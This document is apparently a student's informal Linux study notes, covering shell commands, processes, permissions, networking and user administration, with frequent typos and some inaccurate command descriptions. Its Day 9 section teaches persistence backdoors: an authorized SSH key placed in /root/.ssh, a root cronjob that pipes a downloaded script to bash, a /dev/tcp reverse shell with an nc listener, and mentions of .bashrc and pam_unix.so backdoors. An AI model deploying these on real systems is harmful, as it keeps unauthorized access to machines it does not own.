# Day 1
In linux everything is file 
- pwd
  It means print working directory. Whic tells you that in which present location you are.
- whoami
  This will tell you who is login in the system.
- date [+%D]
 It will tell  you the complete date month timezone in full format.
 For the customize data or specific things realted to the time and date you can use.
- ls -ltr
 It is use to sort the file 
- ls -lth
It is use to sort the file in readable format
- Clear
 It is use to cleat the terminal or you can use `ctrl+l`.
- touch newfile_txt
 This touch command   will create the new file. 
- echo "Line to be written">file name with the format
 This will add the line in the given file .

 If you want to go to the last line of the file then just press the `SHIFT+G`.
 If you want to go to the first line directly then just press the `P`.
 Forward slash `/` is the top to bottom search. 
 Question marks is for bootom to up `?`.
- `#` It means that it is login as the root user or some privilage power .
- `$` It means that it is login as the normal user .
- `sh-5.2# means`You are using the shell command and you have the root .
- `cat` It is the command line utility that displays the file contents .It full form is concatenate .



user access, this is command prompt that you will execute administartive commands .

- `[root@archiso]#` is a command prompt seen in the terminal when logged in as the root
-  `root@archiso:` This is user and host combination this is not the command prompot. This is used for the documentation or specyfiying SSH login credential .



 # Process Management 
 It works is to track the process.
 `ps` - process status.
  to check the process of anything just type ps -ef | grep name
  - How to get PID of process
    pgrep name of the service which you want to know the process .
    You will the process ID of running stuff only you wont get the process if of stopped thing
  -  How to stop a process ID
    `` kill -9 process_id`  // This will kill the process forcefully .
  -  How to stop procees with the name 
     `plill name `

  - How to see all the active jobs 
   Jobs are the task which we give to terminal
    `jobs`
     and ctrl+z is use to pause the job it not yet 
    bg for the process working in the background 

    # Networking part
    To check wheather the server is connected to the internet or not 
    `ping www.google.com`
    if we see that 0% packet is loss then it  is connected to the internet 
   

   # Day 2
   • You own the objects you create.
   • The special user account called “root” can act as the owner of any object,Certain system calls (e.g., settimeofday) are restricted to root.
   You control and communicate with most devices through files that represent them in /dev. Since device files are filesystem objects, they are
   subject to filesystem access control semantics. You can determine the ownerships of a file with ls -l:
   ## Root 
   Since root is just another user, most systems let you log in directly to the root account.To begin with, root logins leave no record of what operations were performed as root.Another disadvantage is that the log-in-as-root scenario leaves no record of who was actually doing the work.
   A marginally better way to access the root account is to use the `sudo` command.
   `Sudo` takes as its argument a command line to be executed as root (or as another
restricted user). sudo consults the file /etc/sudoers (/usr/local/etc/sudoers on
FreeBSD), which lists the people who are authorized to use sudo and the commands
they are allowed to run on each host. If the proposed command is permitted, sudo
prompts for the user’s own password and executes the command.
sudo keeps a log of the command lines that were executed, the hosts on which they
were run, the people who ran them, the directories from which they were run, and
the times at which they were invoked. This information can be logged by syslog or
placed in the file of your choice. 

Sudo has a couple of disadvantages as well. The worst of these is that any breach in
the security of a sudoer’s personal account can be equivalent to breaching the root
account itself., It is unfortunately not a safe way to define limited domains of autonomy or to place certain operations out of bounds.The rule is that sudo always obeys the last matching line, with matching being
determined by the entire 4-tuple of user, host, target user, and command. Each of
those elements must match the configuration line, or the line is simply ignored.
`TIP` -- Try to lock the root account using `passwd -l`
Most often, UIDs under 10 are system accounts, and UIDs between 10 and 100 are pseudo-users associated with specific pieces of software.

# Process
A process represents a running program. It’s the abstraction through which memory,
processor time, and I/O resources can be managed and monitored.
System and user processes follow the same rules, so you can use a single set of tools
to control them both.A process consists of an address space and a set of data structures within the kernel. The address space is a set of memory pages that the kernel has marked for the process’s use.Pages are the units in which memory is managed. They are usually 4KiB or 8KiB in size.A “thread” is an execution context within a process. Every process has at least one
thread, but some processes have many. Each thread has its own stack and CPU
context but operates within the address space of its enclosing process
 ## PID
The kernel assigns a unique ID number to every process.
A process’s scheduling priority determines how much CPU time it receives.
`ps -aux`- Comaand like ps show the snapshot of the system at particular time.
`ps -lax`- This works is also the same as ps-aux.but it is faster then ps-lax.
`top` -> It is the real-time version of ps that gives a regularly updated,intractive summary of process and their resource usage.
The Linux versions of ps and top read their process status information from the
/proc directory, a pseudo-filesystem in which the kernel exposes a variety of interesting information about the system’s state.


# Day 3
In linux we have single file system tree.
Attaching anything is called mounting .

- `cal` = A is default,that display a calender of the current month.
- `df` = To see the current amount of the free space in the your disk.
- `free` = To display the amount of the free memory .
- `exit` = To exit the terminal.
- `pwd` - Print the name of the current working directory
- `cd` = Change directory
- `ls` = List directory contents 
- `/dev` =This contain the device nodes.Everything is a file here kernal maintain the a         list of all the devices it understands.
- `/etc` = It maintain the system-wide configuration-file
- `/lib` = It contains the shared library files use by the core systems.
- `/opt` = It is use to store the optional software mostly it holds the commercial software.

- `127` = Means linux system was not able to find the command referenced inside the script.
- `echo ` = This prints the simple text arguments in the terminal.
- `echo` = $((any mathematical expression )) = This will simple follow the rule of the bodmas.

- `echo` { } = This will create the multiple string from the pattern containing braces.
- `su` = This command say that you are substitue user or switch user.,we just need to use su with the username of the desired account it will switch to that account.
- `su -l` to login as a root
-  `getent passwd `=The getent passwd command retrieves entries from the password database on a Linux system. This includes information about user accounts stored in the /etc/passwd file.
- `sudo userdel username` = This will  delete the user from the system.
- `history` =This will display the whole content of the of the history list.
- `id` = This is the numerical identifiar , The output will be  [`uid` This is known as the user id],[`gid` is the group id ],[`groups` are the fundamental of collection of the id  ].
- `Note` -> User accounts are defined at the /etc/passwd file, and groups are defined at the /etc/group file.
- `exit` - This command will take you to the root terminal.
- `passwd` - This will change the current password.
- `ps x` - This will give the bigger picture of what system is doing . `STAT` will be shown here which means that state abd revels the current status of the process.
- `ps-aux` - This will give the display of the process belonging to the every user.
      - USER -> this isowner of the process `User ID`
      - %CPU -> CPU usage as a percent 
      - % MEM -> Memory usage as percent
      - VSZ -> Virtual memeory size 
      - RSS -> The amount of physical memeory that is `RAM` the process is using in kilobytes.
      - Start -> Time when the process has started 

- `top` - This command display a continuously updating the system process listed in order
       - `Load average` -> It refers to the number of process that are waiting to run.
       - `Swap` -> This is swap space which means the virtual space is being used.
- `q`  - This will make you out from the shell.

#  Day 4
 - Boot process
  Most linux distribution copy the boot kernal message into a speical ring buffer in memeory called a kernal ring buffer(It is a data structure for logging message).The buffer is circular and set to a predetermined size. As new message are logged in the buffer,the older message are rotated out.
  The `dmesg` command displays the most recent boot message that are currently stored in the kernal ring buffer.
  `dmesg` it displays the most  recent boot message that are currently stored in the the kernal ring buffer,
- `ping` This command will check wheather your system is connected to the internet or not . 
   - `ping -n`-> For viewing them in  number.
   - `ping -l`-> For specifying the transmission as is 1 second. 
- `free` -> This command is use to check the amount of space is free in the system.
    - `free -g` -> To view in gb 
    - `free -k` -> To view in kb
    - `free -m` -> To view in mb
- `man` -> For the manual page 
- `passwd` -> For changging the password
-`w` -> It will give you the information regarding the list of logged in users 





# Networking
Web and email acces are the primary uses of computers.

- TCP/IP  is the networking system that underline the internet.It doesn't depend on any particulaar hardware or operating system. so devices that speaks TCP/IP can all exchange data,despite their many difference.

- IP -> Internet protocol,which routes data packets from one machine to another.
- ICMP -> Internet control message protocol,it defines the several kind of low-level support for the the IP,including the error message.
- ARP -> Address Resolution Protocol,it translate IP address to hardware address
- UDP -> The user datagram protocol,which implements the unverified-one way data delivery
- TCP -> The transmission control protocl which implents reliable,small duplex,flow-controlled,error-controlled conversations.

# Day 4
 - `ps` This will tell the list of  running process that are currently running for ur session. amd in detail you have to use `ps-u`.
 - `lscpu` This will tell the all CPU architure information as threads,sockets,cores and cpu.
 - `scp` This is used for securely transfeering files betweem machines.
 - `mv`  This command is used to move file from one to another.
 - `kill` This is used to kill the ongoing process manually from the terminal.
 - `env` This is use to display all the environment  variable in the Terminal.
 - `hwclock` This is use to view the hardware clock or set it new date.
 - `lshw` This will give the detailed hardware information information of the system on which the Linux is running.It gives you the small details about hardware.
 - `lspci` This will list the PCI device of your hardware. // PCI allow device to communicate with CPU and the other components.
 - `lsusb` This will list the USB decive of your hardware.

 - `nano` This will open the command line text editor .`ctrl+x will hwlp you to close this 

 - `yes` This is fun command 
 - `last` This will tell the list of last logged in users into the system as an output in linux terminal.

 - `kmod` This command will display all the currently loaded moduled on the system.
 - `pstree` This will display all the current running process in the tree format on the linux terminal.

 - `lsusb` This will show the information about all the `USB` buses connected to the hardware and external USB device connected to them.
 
 - `sudo` This will let u run any command with the root user permisson.
 - `apt`  This will help user to interact with the packaging system as .
 - `zip` This will help  you to compress the file 
 - `shutdownn` This will help you to shutdown the computer directly from the terminal.
 - `vmstat` This will let you known the system virtual memory usage.
 - `ssh` This will let you help to connect to host computer as a user.
 - `nice` This will let you change the priority of the running process.
 - `nproc` This will display the number of processing units alloted to the current running process.
 - `scp` This means secure copy is used to copy files and directories between hosts on the network
 - `sleep <n> ` This w
 - `tload` This will provide the load average.


# Day 5
 - Adminstrating users and Groups 
   The identification process referred to as authentication,provide access to major function.
  -  User accounts are stored in text file .
   -  `useradd`
   -  `usermod`
   -  `userdel`
   -  `tail/etc/passwd grep|username`  This need to be solved 
   - `w -  who ` This commands display all the current login user into the system.
 - Groups associate user account that have similiar security requirements.  
    - `groupadd` This create a new group .
    - `groupmod` This will modify the existing group.
    - `groupdel` This will delete the existing group.
 - One should always avoid logging into a system as the root user.
 - Standard user accounts typically  have privilages to manages their own data and some basic system things.
 - Service accounts represents service running on the system that consume resource as service are represented by their service accounts,these user cant usually make the configuration.
 - Any account using ` su - root` essentially is the server adminstrator.
 - 



 - Package management is the way of installing and managing the software on the system.
 Virtually all software for the linux are found at the internet .
 The basic unit of software in the packaging is the package file.A package file is the compressed collection of the files that comprises the software package.
 - Most of the tym package are rleased into central repository.

# Day 6
- 
 `-` one dash informs the system that we will pass one letter argument, like 'l'
 `-` two dashes means that argument will contain more than one letter. Most commonly it will be an english word
 - Linux uses . on the beginning of the object's name. We call these files the dotfiles. 
 - The first, . simply means the current directory of the user.
 - The second, .. means parent directory.
 - `a` means all 
 - `A` measn almost all 

 - Linux allows us to list files using multiple sorting options.
    atime - the last time when file was accessed
    mtime - last modification time. By modification we mean change in the file content.
    ctime - last metadata modification time. We mean here - permissions change, location of the file, etc. 
    timestamp?

This is the numerical representation of the time. It is the number of seconds passed from Unix epoch which is midnight of 1st of January, 1970.

Example how it looks is visible below

$ date +%s
1635797690
$ date
Mon 01 Nov 2021 08:14:52 PM UTC
Well, on the occasion we learned a new command - date. Enough to say, this command shows the current date and time:

date .

The first sort option will be -t. This argument sorts files with the last modification time, newest files come first.

Let's try.

ls -lt

We use two arguments, to observe things better. We can specify exactly the modification time by adding u to the argument list. But please remember, in order to print this information properly you have to use t with another argument (u in this case).

ls -ltu

Ok, now let's print the list and order it by ctime - metadata change.

ls -ltc

Well, not much changed, right? Please execute these commands and carefully observe the output

touch theNewestFile (this creates a new file)
ls -ltu
ls -ltc
echo "hello world!" > file-02 (this will add something to the file)
ls -ltu
ls -ltc
chmod 444 file-01 (this will change the permissions of the file)
ls -ltu
ls -ltc

Please spend some time to understand what and how was printed. We used some commands which are new, but do not waste your time on them now.

OK, we know how to sort files by time, let's learn how to do it by size.

As usual, we have multiple options to do so.

First, we run this command

ls -s

This shows the short list of files and allocated space. As we already know, we can combine this argument - s - with others. Let's do it.

ls -ls

But this is what you have by default, using ls -l, right? No? You are correct, the answer is no. Take a look on the beginning of each line, this is where you can find, what was added by -s.

Why we used s? I wanted you to pay attention here. When capital S is used, this means sort.

ls -lS it sorts files by size, largest are going first.

So, arguments are case-sensitive, like... everything in Linux :)

Before we use the next command, there is one argument more to be learned. This argument is --human-readable, or better - -h

Let's try.

ls -lh we have printed the size of the files not in bytes, but in more readable form, with K, M, or G, that sort of things.

h use the powers of 1024. So, 1K is a 1 powered by 1024. We have another otion

ls -l --si

which uses powers of 1000. But.. I think no one uses that :

Ok, let's try to sort with h parameter

ls -lSh

Day 7
Man is one of the most powerfull tool we have in our linux system.
 `man man ` It will list all the manual page details 
 `man ls`   It will list all the command 
 In man we have different section available for each things 
 `man -f intro `
 `man -k ls`
 `man -w ls `

  # Work with the directories
 `ls -l` - It will check the directory.
 `mkdir` - It will new create the directory.
 `mkdir filenamw {n..n+}` This will create the multiple directory with the same name.
  `mkdir -p directoryname/filename` this will create the complicated file at one place.

 `cd` In order to change the directory we need to use this command
 `rmdir` This will remove the directory .
 `-r` This means that  go recursively  through the directories.
 `f` this means go forcefully.

 # Working with the files
  Remember file directory all are different 
  - To create the empty file we use the command `touch filename`. 
  - 'touch filename {n..n+1}' this will create the the multiple file 

  -`rm filename ` this will delete the particular file .


# Pipes and redirections 

- The concepts is simple, really. The pipes and redirections are used to send (or retrieve) some information sent from one command or script to another command or script. It works on files too.

- grep. This command search for given pattern in the output. Output may be the file or output from other command.

# Ps command
- ps
  - TTY - print the name of the Terminal associated with the process. 
  - TIME - total time of CPU usuage.
  -  CMD - the command which is running .
  - ps -a
  - ps a
  - ps T 
  - ps -A to list all the process
  `STAT` it means the state if the process.Here we have few abbrication 
   - D  uninterruptible sleep (usually IO)
   - I   Idle kernel thread
   - R  running
   - S  interrupitable sleep
   - T  stooped by the job control signal 
   - x  stopped should never be seen 
   - z   zombie process (terminated but not repead by its parent)

   - `ps -ef` for the admin
   - `ps aux --forest`
   - `ls -al`
   -  `ls -alh`

   History file is configured somewhere at the system which can be aceesed.
 # inode

 - `df`
 By definition, an inode is an index node. It serves as a unique identifier for a specific piece of metadata on a given filesystem, and the disk block location of this object.

The theoretical maximum number of inodes is equal to 2^32 (approximately 4.3 billion inodes). Second, and far more important, is the number of inodes on your system. Generally, the ratio of inodes is 1:16KB of system capacity.

# Soft and hard links 
Our system in full of links .
We have two type of links .
- `Hard`
- ` Soft` -system uses soft links to configure specific versions of tools, to the system-related services configurations.

- In short we can say that links are the shortcut to the original detination/file .





 # Day 7

 - `find / -type d` This will list all the directories of the system 
 - `ls / ` this will also list all the directories of the system 
 - `ls -al` The output permission.  
  ```Rust
  -rw-r--r-- 1 kaushikraj 197609  1264 May 13 14:57 06.md means
  rw-: The owner (kaushikraj) has read and write permissions.
  r--: The group (197609) has read-only permissions.
  r--: Others (everyone else) have read-only permissions.
  1: This indicates the number of hard links to the file.
  kaushikraj: This is the owner of the file.

  197609: This is the group that the file belongs to.

  1264: This is the size of the file in bytes.

  May 13 14:57: This is the date and time when the file was last modified.

  06.md: This is the filename.

  ```

  - `ls -s` This means that it will give the total size of the file .

# Day 8
 pacman -Q it is used to list the all the installed software in the system .
# Day 9
- A backdoor is simply something we can do to ensure our consistent access to the machine. Even if our machine is shutdown  or whatever we will be able to acces to it .

- These are not the vulnerabilities but just a way to maintain your acces on target .
- SSH key gen is the one the backdor of the to acces the system,to do so we simply run the command `ssh-keygem` .
  - Here we will have two key one private and other one will public . we can now go to /root/.ssh and leave our public key there. Don't forget to rename the public key to : authorized_keys
  - if the .ssh directory is not present then you can make the `mkdir .ssh`.
  - Before doing so, give the private key the right permissions using : chmod 600 id_rsa.
  - This backdoe isnt hidden at all anyone with the right permission can acces the desired machine ,
  - `-i` is the flag in the ssh that is use to show our private key .

- PHP backdors (This is out of my door)
 - Web root is actually located at the /var/www/html .


- CronJob Backdoors
 - This backdoor consist of creating a cronjob .
 - /etc/cronjob this represent all the task that are schdules to run at the some time on your machine ,you just need root acces to do this ,m and h stands for the minute and hour  .
 - dd this line into our cronjob file :

* *     * * *   root    curl http://<yourip>:8080/shell | bash

Notice that we put a "*" star symbol to everything. This means that our task will run every minute, every hour, every day , etc .

We first use "curl" to download a file , and then we pipe it to "bash"

The contents of the "shell" file that we are using are simply :

-------------------------------------------------

#!/bin/bash

bash -i >& /dev/tcp/ip/port 0>&1

--------------------------------------------------

We would have to run an HTTP server serving our shell.

You can achieve this by running : "python3 -m http.server 8080"

Once our shell gets downloaded, it will be executed by "bash" and we would get a shell!

*Don't forget to listen on your specified port with "nc -nvlp <port>"*

- `.bashrc` This is used for the one who have the bash as their login shell,and we can run the command to include our reverse sheel into their ".bashrc" .
- `pam_unix.so` This is the one of the backdor that is one of many file in the linux that is responsible for authentication .
 # Day 10
 Screen day 
  # Administrating Users and Groups .

- Modern OS require users to prove their identity. This identification process,refffered to as authentication,provides a major function .The user environament can be customized to fit that individual work on habit style .
 - The administarator shoul log on to the server with the non privillaged accounts and then elevates privilages only when it is necessary.
 - Manage the user account 
 - `/etc/passwd` file stores the actual user account and maintains
   various settings related to accounts.
 - `/etc/shadow` file stores password information for the accounts.
- It may seem odd that account information is distributed across two files and that
specifically password information is stored in a different file than user accounts .
- Each fetures are stored in the individual home directories .
- The tilde character represent the current user directory .
- `useradd` This will create the user
- `usermod`  This will modifies the existing user
- `userdel`  This will remove the exiting user .
- `groupadd` Create anew group
- `groupmod` Modify an existing group
- `groupdel` Remove an existing group
`Rust
useradd kaushik
groupadd sales
usermode -aG sales kaushik 
tail /etc/group | grep sales



`
- 'This is the command for the 
- Pluggable Authentication Models 
 - It supplements the authentication models .
 - `cat /etc/passwd` - It is the text file written by the root users and read by all users,it contains the information about the system users.
 - `cat /etc/shadow`- It  store the user passwd information in a secure manner. It is read by the root user only ,It protect the password by hasing them from the regulare users           

  